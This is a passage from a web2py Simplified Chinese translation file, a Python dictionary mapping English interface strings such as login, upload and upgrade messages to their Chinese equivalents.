'Timestamp': '时间戳',
'Traceback': 'Traceback',
'Twitter': 'Twitter',
'Unable to check for upgrades': '查询新版本失败',
'Unable to download': '无法下载',
'Unable to download app': '无法下载应用程序',
'unable to parse csv file': '无法解析CSV文件',
'Update:': '更新:',
'Upload existing application': '上传已有应用程序',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': '使用下列方式可得到更复杂的条件表达式, (...)&(...) 代表必须都满足, (...)|(...) 代表其一, ~(...)则代表否.',
'User': 'User',
'User %(id)s Logged-in': '用户 %(id)s 已登录',
'User %(id)s Registered': '用户 %(id)s 已注册',
'User ID': '用户编号',
'Users': 'Users',
'Verify Password': '验证密码',
'Videos': '视频',
'View': '查看',
'Views': '视图',
'Welcome': '欢迎',
'Welcome %s': '欢迎 %s',
'Welcome to web2py': '欢迎使用 web2py',
'Welcome to web2py!': '欢迎使用 web2py!',
'Which called the function %s located in the file %s': 'Which called the function %s located in the file %s',
'Working...': 'Working...',
'YES': '是',
'You are successfully running web2py': '您已成功运行 web2py',
'You can modify this application and adapt it to your needs': '请根据您的需要修改本程序',
'You visited the url %s': 'You visited the url %s',
}
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.